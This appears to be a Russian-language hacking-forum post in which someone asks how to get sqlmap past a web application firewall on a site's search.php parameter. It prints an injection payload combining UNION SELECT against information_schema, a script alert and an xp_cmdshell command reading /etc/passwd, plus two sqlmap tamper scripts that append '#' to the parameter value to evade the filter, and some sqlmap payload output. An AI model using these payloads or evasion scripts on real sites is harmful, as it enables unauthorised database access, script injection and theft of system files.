Попробуй руками https://forum.antichat.com/threads/43966/Пробовал я убирать как писалось выше делать, но так же была ошибка. потом я добавил # в конце линка и начало пайлода
и ваф не сработал. я попробовал тампер такой написать. процес пошел дальше.Код:https://www.site.com/search.php?bid=399#9719 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
но при каждом новом палодеКод:#!/usr/bin/env python from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): pass def tamper(payload, **kwargs): return payload.replace("=399", "=399#") if payload else payload
[PAYLOAD] 399) AND
[PAYLOAD] 5290 AND
[PAYLOAD] 2303
опять срабатывает. это мне нужно на каждый пайлод тампер писать? по типу
Чувствую я что то не то делаю)) Помогите пожалуйстаКод:#!/usr/bin/env python from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): pass def tamper(payload, **kwargs): return payload.replace("=399", "=399#5290)") if payload else payload

Вяжите.